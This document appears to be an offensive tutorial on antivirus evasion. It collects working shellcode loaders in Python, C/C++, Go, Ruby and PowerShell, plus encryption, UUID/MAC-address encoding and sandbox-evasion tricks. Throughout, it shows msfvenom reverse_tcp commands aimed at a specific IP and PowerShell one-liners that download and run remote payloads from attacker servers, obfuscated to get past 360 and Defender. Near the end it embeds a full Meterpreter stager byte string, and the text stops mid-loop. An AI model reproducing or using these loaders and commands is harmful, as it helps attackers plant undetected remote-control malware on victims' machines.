Shellcode loader
For shellcode to run it has to go through the following steps:
allocate a block of memory;
load the shellcode into that memory;
execute that memory.
Points to keep in mind along the way:
load DLLs by dynamic resolution, which avoids IAT hooks;
do not request rwx (read/write/execute) memory directly; request rw memory first and change it to executable later, since AV products are very sensitive to rwx memory;
there are many ways to get the bytes into memory; besides the common copy and move there is UUID loading, which both disguises the shellcode and writes it straight into memory;
the memory can also be executed through a callback such as EnumChildWindows;
useless code can be inserted between API calls to break up the API call sequence;
adding a few sleeps gets past some sandboxes.
Shellcode mutation, encryption, obfuscation and callback-execution notes

```
# C/C++ - shellcode analysis - OD & IDA & source tracing
1. EXE source tracing - IP and port - AV analysis
2. Compile and modify - IP and port - threat awareness
reverse_tcp.asm
https://www.cnblogs.com/Akkuman/p/12859091.html
https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/windows/reverse_tcp.rb

# C/C++ - shellcode mutation - encoding, obfuscation and encryption algorithms
Xor Aes Hex Rc4 Rsa etc.
https://github.com/Arno0x/ShellcodeWrapper
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=47.94.236.117 lport=3333 -f raw > shellcode.raw
1. python2 shellcode_encoder.py -cpp -cs -py shellcode.raw xiaodi xor
CS & MSF
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=47.94.236.117 lport=3333 -f raw > shellcode.raw
python xor.py -s shellcode.bin -d payload.c -n 10 -r out.bin
2. python2 shellcode_encoder.py -cpp -cs -py shellcode.raw xiaodi aes
3. Hex
msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=6688 -f c
https://gchq.github.io/CyberChef/
https://github.com/ByPassAVTeam/ShellcodeLoader
LoaderMaker.exe download.dat (hex data) xiaodi.exe (output file name)
4. Rc4
msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=6688 -f c
https://blog.csdn.net/weixin_45590789/article/details/105536623

# C/C++ - callback execution - assembly & handles & API & UI etc.
Callback_Shellcode_Injection-main
https://github.com/ChaitanyaHaritash/Callback_Shellcode_Injection
```
Loaders
https://shu1l.github.io/2021/08/17/mian-sha-xue-xi-shellcode-jia-zai-mian-sha/
https://xz.aliyun.com/t/9385
https://xz.aliyun.com/t/12253
Python loader

```python
import ctypes

shellcode = bytearray("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b")
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))
```
The code is short; the main library it relies on is ctypes.
ctypes is Python's foreign function library. It provides C-compatible data types and allows calling functions in DLLs or shared libraries, so these libraries can be wrapped in pure Python.
Main flow
Call VirtualAlloc to allocate a readable, writable and executable region of dynamic memory.
Call RtlMoveMemory, which copies the contents of one memory region into another.
Call CreateThread to create a new thread alongside the main thread.
Call WaitForSingleObject to wait for the created thread to finish.
Of course, AV products now detect this fairly primitive approach very reliably, so obfuscation and encryption have to be layered on top.
Common choices are hex encoding, AES, XOR, base64 and so on; you can also write your own encryption and decryption, which evades better.
HEX encryption

```python
import ctypes

buf = b""  # the page embeds the full payload byte string here; it is omitted in this copy
shellcode = buf
shellcode = bytearray(shellcode)
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)))
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
```
Base64 obfuscation

```python
import ctypes
import base64

buf = b'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'
buf = base64.b64decode(buf)
shellcode = buf
shellcode = bytearray(shellcode)
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)))
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
```
AES obfuscation

```python
from Crypto.Cipher import AES
from binascii import b2a_hex, a2b_hex
import ctypes, base64


def add_to_16(text):
    if len(text.encode('utf-8')) % 16:
        add = 16 - (len(text.encode('utf-8')) % 16)
    else:
        add = 0
    text = text + ('\0' * add)
    return text.encode('utf-8')


def decrypt(text):
    key = '9999999999999999'.encode('utf-8')
    iv = b'qqqqqqqqqqqqqqqq'
    mode = AES.MODE_CBC
    cryptos = AES.new(key, mode, iv)
    plain_text = cryptos.decrypt(a2b_hex(text))
    shellcode = bytes.decode(plain_text).rstrip('\0')
    return shellcode


def zhixing(shellcode):
    rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
    ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
    handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
    ctypes.windll.kernel32.WaitForSingleObject(handle, -1)


if __name__ == '__main__':
    e = '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'
    d = decrypt(e)
    d = base64.b64decode(d)
    zhixing(d)
```
# Python - packager choice - PyInstaller & py2exe & Nuitka

```
1. pyinstaller
-F, --onefile        Pack into a single file; use it when all the code is in one .py file, not for multiple .py files
-D, --onedir         Pack into a directory; dist will hold many dependency files, suited to tools written as a framework; I personally recommend this because the code is easier to maintain
-K, --tk             Include TCL/TK when deploying
-a, --ascii          Do not include encodings; on Unicode-capable Python versions all encodings are included by default
-d, --debug          Produce a debug build of the executable
-w, --windowed, --noconsole   Run under the Windows subsystem; no console window opens when the program starts (Windows only)
-c, --nowindowed, --console   Run under the console subsystem (default) (Windows only)
Usage: pyinstaller -F test.py
```
py2exe reference: https://hoxis.github.io/python-py2exe.html

```
Install: pip install py2exe
Build: python setup.py py2exe
Code: setup.py
```

```python
from distutils.core import setup
import py2exe

INCLUDES = ['108-pickle-release']
options = {
    "py2exe": {
        "compressed": 1,
        "optimize": 2,
        "bundle_files": 1,
        "includes": INCLUDES,
        "dll_excludes": ['MSVCP90.dll']
    }
}
setup(
    version='1.0.0',
    options=options,
    description="this is a xiaodi test",
    zipfile=None,
    console=[{"script": '108-pickle-release.py'}]
)
```
Nuitka reference: https://jiesonshan.github.io/2020/05/27/Nuitka%E6%89%93%E5%8C%85python%E4%BD%BF%E7%94%A8%E6%96%B9%E6%B3%95/
https://juejin.cn/post/7109310663851245605

```
--standalone: easy to move to another machine, no Python install needed
--show-memory --show-progress: show the progress of the whole build
--nofollow-imports: do not compile any of the code's imports
--follow-import-to=utils,src: the two source folders that should be compiled to C++ code, separated by commas
--output-dir=out: write the output to out
--windows-disable-console: no console window pops up when the exe runs
--mingw64
--standalone                   standalone environment, required (otherwise it will not run when handed to someone else)
--windows-disable-console      no CMD window
--output-dir=out               emit the exe into the out folder
--show-progress                show the compile progress, very intuitive
--show-memory                  show memory usage
--include-qt-plugins=sensible,styles   PyQt styles do not change after packing
--plugin-enable=qt-plugins     PyQt plugins to load
--plugin-enable=tk-inter       required when packing the tkinter module
--plugin-enable=numpy          required when packing numpy, pandas, matplotlib
--plugin-enable=torch          required when packing pytorch
--plugin-enable=tensorflow     required when packing tensorflow
--windows-icon-from-ico=your.ico   the program icon
--windows-company-name=        company information on Windows
--windows-product-name=        product name on Windows
--windows-file-version=        file version information on Windows
--windows-product-version=     product version information on Windows
--windows-file-description=    file description on Windows
--windows-uac-admin=           on Windows the user can install with administrator rights
--linux-onefile-icon=          icon location on Linux
--onefile                      pack into a single exe like pyinstaller
--include-package=             copy packages (folders) such as numpy, PyQt5
--include-module=              copy modules (.py files) such as when.py
Usage: nuitka --mingw64 --standalone --show-memory --show-progress --nofollow-imports --follow-import-to=utils,src --output-dir=out 108.py
```
C++ loader
For C/C++, the common loading methods are function-pointer execution, inline assembly instructions and pseudo-instructions.
Function-pointer execution
Simple C code:

```c
char shellcode[] = "";

int main(int argc, char const *argv[])
{
    (*(void (*)())shellcode)();
    return 0;
}
```

`(void(*)())shellcode` casts the shellcode buffer to a pointer to a function returning void; the `*` dereferences that pointer and the `()` calls the function, so the shellcode is executed.
Dynamic memory loading

```c
#include <Windows.h>
#include <stdio.h>
#include <string.h>
#pragma comment(linker, "/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")

unsigned char buf[] = "shellcode";

int main()
{
    char *Memory;
    Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(Memory, buf, sizeof(buf));
    ((void (*)())Memory)();
}
```

The principle is the same as the Python implementation above.
Inline assembly instructions
For background on the assembly instructions see:
https://www.cxyzjd.com/article/Hkenter/2855771

```c
#include <stdio.h>
#include <windows.h>
#pragma comment(linker, "/INCREMENTAL:NO")
#pragma comment(linker, "/section:.data,RWE")

unsigned char shellcode[] =
    "\xd9\xc5\xd9\x74\x24\xf4\xba\x8b\xfc\x02\xdd\x5e\x2b\xc9\xb1"
    "\x56\x83\xee\xfc\x31\x56\x14\x03\x56\x9f\x1e\xf7\x21\x77\x5c"
    "\xf8\xd9\x87\x01\x70\x3c\xb6\x01\xe6\x34\xe8\xb1\x6c\x18\x04"
    "\x39\x20\x89\x9f\x4f\xed\xbe\x28\xe5\xcb\xf1\xa9\x56\x2f\x93"
    "\xca\xec\x3f\xcd\x34\xa2\x40\xc4";

int main(int argc, char **argv)
{
    __asm
    {
        mov eax, offset shellcode;
        JMP EAX
    }
    return 0;
}
```
Alternative form

```c
void RunShellCode()
{
    __asm
    {
        lea eax, shellcode;
        jmp eax;
    }
}
```

`MOV EAX, offset shellcode` loads the address of the shellcode buffer into register EAX.
`JMP EAX` jumps unconditionally to the address in EAX.
Pseudo-instructions
A pseudo-instruction is a directive that controls the assembly process. Such directives are not executable instructions and produce no machine code of their own; they only pass information to the assembler during assembly, for example which parts are instructions, which parts are data and what word length the data has, and where the program starts and ends.

```c
void RunShellCode_5()
{
    __asm
    {
        mov eax, offset shellcode;
        _emit 0xFF;   // _emit writes raw bytes into the code stream:
        _emit 0xE0;   // FF E0 is the encoding of jmp eax
    }
}
```
Go loader
https://www.cnblogs.com/newbe3three/p/16214882.html
https://cn-sec.com/archives/981565.html
Dynamic memory loading
Core code:

```go
package main

import (
	"syscall"
	"unsafe"
)

const (
	MEM_COMMIT             = 0x1000
	MEM_RESERVE            = 0x2000
	PAGE_EXECUTE_READWRITE = 0x40
)

var (
	kernel32      = syscall.MustLoadDLL("kernel32.dll")
	ntdll         = syscall.MustLoadDLL("ntdll.dll")
	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")
	RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
)

func main() {
	xor_shellcode := []byte{0x89, 0x3d, 0xf6, 0x91, 0x85, 0x9d, 0xb9, 0x75, 0x75, 0x75, 0x34, 0x24, 0x34, 0x25, 0x27, 0x24, 0x23, 0x3d, 0x44, 0xa7, 0x10, 0x3d, 0xfe, 0x27, 0x15, 0x3d, 0xfe ...}
	addr, _, err := VirtualAlloc.Call(0, uintptr(len(xor_shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
	if err != nil && err.Error() != "The operation completed successfully." {
		syscall.Exit(0)
	}
	_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&xor_shellcode[0])), uintptr(len(xor_shellcode)))
	if err != nil && err.Error() != "The operation completed successfully." {
		syscall.Exit(0)
	}
	syscall.Syscall(addr, 0, 0, 0, 0)
}
```

The principle is the same as the Python and C/C++ versions above.
An anonymous function is declared and pointed at the memory that holds the shellcode bytes that were read in; that memory is set readable, writable and executable, and calling the function runs the shellcode.
The shellcode can be encrypted or obfuscated, and the loader can be written with different loader code.
Packer tool (Safengine Shielden)
Inline C (cgo) loading
Core code:

```go
package main

import "C"
import "unsafe"

func main() {
	buf := ""
	buf += "\xdd\xc6\xd9\x74\x24\xf4\x5f\x33\xc9\xb8\xb3\x5e\x2c"
	// ...omitted...
	buf += "\xc9\xb1\x97\x31\x47\x1a\x03\x47\x1a\x83\xc7\x04\xe2"
	shellcode := []byte(buf)
	C.call((*C.char)(unsafe.Pointer(&shellcode[0])))
}
```
PowerShell manual obfuscation:
Padding with junk data
Add it directly into the base64 encoding and strip it again before decoding (so that the AV verdict fails)
Add it directly into the original code, then decode and restore (gets past Huorong)

```powershell
Set-StrictMode -Version 2
$DoIt = @'
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
'@
$z = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($DoIt))
If ([IntPtr]::size -eq 8) {
    start-job { param($a) IEX $a } -RunAs32 -Argument $z | wait-job | Receive-Job
}
else {
    IEX $z
}
```

```powershell
$bb = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($x))
powershell -ExecutionPolicy bypass -File hr.ps1
```

Project-based obfuscation: Invoke-Obfuscation https://github.com/danielbohannon/Invoke-Obfuscation

```
Load the module:   Import-Module ./Invoke-Obfuscation.psd1
Run the tool:      Invoke-Obfuscation
Process a file:    set scriptpath C:\Users\86135\Desktop\1.ps1
Process code:      set scriptblock 'xxxx'
Enter encoding:    encoding
Choose encoding:   1-8
Write output:      out C:\Users\86135\Desktop\11.ps1
```
Separated (staged) evasion
The shellcode is hosted on a web server and a loader downloads and executes it.

```powershell
$d = ((New-Object System.Net.Webclient).DownloadString('http://47.94.236.117/1.txt'))
# decode:
$x = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($d))
# http://47.94.236.117/1.txt = $d, the base64 data
$d = ((New-Object System.Net.Webclient).DownloadString('http://47.94.236.117/1.txt'))
$x = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($d))
```
PowerShell - file mode - signature modification to get past Defender (does not get past Huorong)
https://www.cnblogs.com/zzjdbk/p/14380138.html
Fuzzing the Defender detection signatures
1. Change the shellcode format
2. Rename every variable and function
Convert the shellcode into byte form and replace the variable and function names with custom ones

```powershell
$string = ''
$s = [Byte[]]$var_code = [System.Convert]::FromBase64String('[shellcode generated by CS]')
$s | foreach { $string = $string + $_.ToString() + ',' }
$string > D:\2.txt
```

If running the command directly to get a callback triggers an alert, the following methods can be used:
3. Junk data interference:

```powershell
powershell -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal set-alias -name key -value IEX; key(New-Object Net.WebClient).DownloadString('ht'+'tp://43.138.27.12:8880/2.ps1')
```
4. Copy powershell.exe into the current directory:

```powershell
# renamed copy:
powershell "$a='IEX((New-Object Net.WebClient).DownloadString(''ht';$b='tp://47.94.236.117/x.ps1''));';IEX ($a+$b)"
copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe bypass.txt
bypass.txt "$a='IEX((New-Object Net.WebClient).DownloadString(''ht';$b='tp://47.94.236.117/x.ps1''));';IEX ($a+$b)"
```

5. The script command can also be converted into an exe program to get around detection.
6. Running the convenient IEX one-liner directly is blocked by 360. Simple syntactic variations can be tried, mainly altering DownloadString and http; for example the Replace function can be used to bypass it.
http://wiki.tidesec.com/docs/bypassav

```powershell
powershell -NoExit "$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://10.211.55.2/shell.ps1'')'.Replace('123','adString');IEX ($c1+$c2)"
```
Assembly-code evasion, reference:
https://forum.butian.net/share/1536
Java evasion (static)

```
1. JAR source feature modification
msfvenom -p java/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f jar -o msf.jar
- Decompile and export the jar - jd-gui
- Modify the callback configuration - config
- Modify the startup main class - MANIFEST.MF
- Modify the execution code - Main.java
- Compile the class - javac Main.java
- Build the jar - jar cvfm xiaodi.jar META-INF/MANIFEST.MF .
2. Pack the JAR into an EXE
Install: exe4j, packed with Inno
exe4j download: https://exe4j.apponic.com/
inno download: https://jrsoftware.org/isdl.php
Instructions: https://www.jb51.net/article/236000.htm
```
Ruby evasion:

```ruby
require 'fiddle'
require 'fiddle/import'
require 'fiddle/types'

shellcode = ""
include Fiddle
kernel32 = Fiddle.dlopen('kernel32')
ptr = Function.new(kernel32['VirtualAlloc'], [4, 4, 4, 4], 4).call(0, shellcode.size, 0x3000, 0x40)
Function.new(kernel32['VirtualProtect'], [4, 4, 4, 4], 4).call(ptr, shellcode.size, 0, 0)
buf = Fiddle::Pointer[shellcode]
Function.new(kernel32['RtlMoveMemory'], [4, 4, 4], 4).call(ptr, buf, shellcode.size)
thread = Function.new(kernel32['CreateThread'], [4, 4, 4, 4, 4, 4], 4).call(0, 0, ptr, 0, 0, 0)
Function.new(kernel32['WaitForSingleObject'], [4, 4], 4).call(thread, -1)
```
No file on disk (loader separation)
https://www.freebuf.com/articles/compliance/290379.html

Python-File - read the shellcode from a text file

```python
with open('s.txt', 'rb') as f:
    s = f.read()
```

Python-Argv - pass the shellcode separately from the loader
Core code:

```python
z = sys.argv[1]
zx = base64.b64decode(z)
exec(zx)
```

Python-Http - fetch the shellcode over a remote protocol

```python
all = requests.get('http://www.xxxx.com/all.txt').text
```

Python-Socket - receive the shellcode over a socket
Reference: https://www.cnblogs.com/Keep-Ambition/p/7459213.html

```python
def zx(data):
    # execute the received code here
    pass


server = socket.socket()
server.bind(("0.0.0.0", 9999))
server.listen(5)
while True:
    conn, addr = server.accept()
    while True:
        data = conn.recv(1024)
        zx(data)
```

Python-Images - hide the shellcode inside an image by steganography
Reference: https://mp.weixin.qq.com/s/c8U2M_iJ8pWaI50sH8u9Hw

```
Encode: RGBAencodeDataInImage(im, arguments['<text>']).save(arguments['<encodedImage>'])
Decode: im = Image.open(arguments['<encodedImage>'])
```

https://mp.weixin.qq.com/s/QZ5YlRZN47zne7vCzvUpJw
UUID conversion: writing shellcode into memory as UUIDs for evasion
https://xz.aliyun.com/t/12253
https://www.crisprx.top/archives/458
https://cloud.tencent.com/developer/article/1787219
C++ UUID loader

```cpp
#include <Windows.h>
#include <Rpc.h>
#include <iostream>
#pragma comment(lib, "Rpcrt4.lib")
using namespace std;

const char *uuids[] = {
    // the page lists the UUID-encoded payload here as a table of UUID strings;
    // it is omitted in this copy and replaced by a single placeholder entry
    "00000000-0000-0000-0000-000000000000"
};

int main()
{
    HANDLE hc = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
    void *ha = HeapAlloc(hc, 0, 0x100000);
    if (ha == NULL)
    {
        cout << "内存申请失败!" << endl;
        return 0;
    }
    DWORD_PTR hptr = (DWORD_PTR)ha;
    int elems = sizeof(uuids) / sizeof(uuids[0]);
    for (int i = 0; i < elems; i++)
    {
        RPC_STATUS status = UuidFromStringA((RPC_CSTR)uuids[i], (UUID *)hptr);
        if (status != RPC_S_OK)
        {
            cout << "UuidFromeStringA()!=S_OK" << endl;
            CloseHandle(ha);
            return -1;
        }
        hptr += 16;
    }
    EnumSystemLocalesA((LOCALE_ENUMPROCA)ha, 0);
    CloseHandle(ha);
    return 0;
}
```
Using a Python 2 script to convert the shellcode into UUIDs

```python
import binascii
import uuid

buf = ''  # the page embeds the full payload byte string here; it is omitted in this copy
uuid_list = []
hex = binascii.hexlify(buf).decode()
hex += '0' * (32 - (len(hex) % 32))
for i in range(0, len(hex), 32):
    print("\"{}\",".format(uuid.UUID(bytes_le=binascii.unhexlify(hex[i:i+32]))))
```
Python 2 UUID loader

```python
import uuid
import ctypes
import binascii

shellcode = ""  # the page embeds the full payload byte string here; it is omitted in this copy
uuid_list = []  # the original named this list `list`, which shadowed the builtin and was never referenced below
for i in range(50):
    bytes_a = shellcode[i * 16: 16 + i * 16]
    b = uuid.UUID(bytes_le=bytes_a)
    uuid_list.append(str(b))
print(uuid_list)
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(uuid_list) * 16), ctypes.c_int(0x3000), ctypes.c_int(0x40))
ptr1 = ptr
for j in uuid_list:
    ctypes.windll.Rpcrt4.UuidFromStringA(j, ptr1)
    ptr1 += 16
handle = ctypes.windll.kernel32.CreateThread(0, 0, ptr, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
```
```python
import uuid
import ctypes

shellcode = b""  # the page embeds the full payload byte string here; it is omitted in this copy


def UUIDConvert(shellcode):
    uuid_shellcode = []
    if len(shellcode) % 16 != 0:
        null_byte = b'\x00' * (16 - len(shellcode) % 16)
        shellcode += null_byte
    for i in range(0, len(shellcode), 16):
        uuid_string = str(uuid.UUID(bytes_le=shellcode[i: i + 16]))
        uuid_shellcode.append(uuid_string)
    return uuid_shellcode


uuid_shellcode = UUIDConvert(shellcode=shellcode)
ctypes.windll.Activeds.AllocADsMem.restype = ctypes.c_uint64
ptr_alloc = ctypes.windll.Activeds.AllocADsMem(ctypes.c_int(len(shellcode)))
ptr_realloc = ctypes.windll.Activeds.ReallocADsMem(ptr_alloc, len(shellcode), len(shellcode))
ctypes.windll.kernel32.VirtualProtect(ptr_realloc, ctypes.c_int(len(shellcode)), 0x40, ctypes.byref(ctypes.c_long(1)))
ptr = ptr_realloc
for code in uuid_shellcode:
    ctypes.windll.Rpcrt4.UuidFromStringA(code, ptr)
    ptr += 16
ctypes.windll.kernel32.EnumSystemLocalesW(ptr_realloc, 0)
```
Python MAC-address in-memory loader https://blog.csdn.net/luochen2436/article/details/124035788
import ctypes

shellcode = b"\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x60\x11\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x31\x73\x68\x51\x00\x27\x6b\x08\x03\x3f\x21\xf1\xec\xd6\xc0\x3b\xae\xe3\xab\x55\x82\xf4\x40\xbc\x5b\x9f\xfa\x45\xbd\x37\x51\x3b\xe0\x0d\xa4\x3b\xb2\xd1\xf9\x74\xda\x3a\xd8\x44\xb1\x60\x84\xc5\x83\x10\x70\x5e\x54\x63\xc7\xf8\xf8\x74\x9b\x2b\x6a\x35\x08\xd5\x11\xa9\x32\x98\xec\xd8\x01\xf0\xc4\xae\x4b\x4b\x6c\xba\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x3b\x20\x4d\x41\x53\x50\x29\x0d\x0a\x00\x36\x33\x5a\x21\x1c\xe3\x65\x2d\x0e\x19\xa1\xd3\x4c\xf9\x56\xc3\x4e\x54\x7e\x1c\x21\x38\x30\xf3\xf7\x7f\x4a\x21\x52\xb8\x55\x9f\xd0\x0f\x25\x99\x79\x4a\x2b\xcc\xd7\x09\x95\x74\x3b\xee\x1c\xfa\xad\xbd\xec\x84\x00\xdb\xd8\x58\x89\xb8\xad\xd3\x86\x5b\xd3\x09\xc2\xcd\xb6\xfd\x9e\x9f\xb2\x26\xc8\xaa\xfc\x0e\xc9\xf8\xa2\xfd\x5c\x99\x91\xb7\x08\x11\xd8\x91\xde\xfe\x43\x95\x1c\x96\x29\x08\x55\x39\x21\x7d\x8c\xd5\xac\x46\x6e\x78\x65\x16\xb9\xf1\x53\xc6\x25\x76\x78\xd7\xfd\xdd\xb0\x7f\x40\xea\x7f\x68\xba\x6e\x5d\x99\x55\x5f\x11\xd9\x05\x90\x92\x2c\x9e\xb3\x75\x5e\x73\x72\x81\x4d\xe0\x00\xa6\x38\x0b\xed\xe5\x4e\xcb\x8d\xd1\x44\x12\xb3\xf8\xd0\x3a\xcc\xd6\x06\xf1\x36\x4f\x8e\x66\x39\x66\x42\xe3\xc7\x74\xa5\xbd\xac\x0d\xe6\xe5\xd3\x53\x0c\x8e\x90\xca\xd3\x01\x0d\x88\x7c\x91\x63\xdb\xe2\xd9\xb3\x4d\x9f\x57\x3b\x64\x31\x8a\x66\xea\x78\xeb\x07\x09\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x34\x33\x2e\x31\x33\x38\x2e\x32\x37\x2e\x31\x32\x00\x49\x96\x02\xd2"

ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
mac_address = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode) / 6 * 17, 0x3000, 0x40)
for i in range(len(shellcode) / 6):
    cut_byte = shellcode[i * 6:6 + i * 6]
    ctypes.windll.Ntdll.RtlEthernetAddressToStringA(cut_byte, mac_address + i * 17)
mac_list = []
for i in range(len(shellcode) // 6):
    mac = ctypes.string_at(mac_address + i * 17, 17)
    mac_list.append(mac)
ptr = ctypes.windll.kernel32.VirtualAlloc(0, len(mac_list) * 6, 0x3000, 0x04)
ptr1 = ptr
for i in range(len(mac_list)):
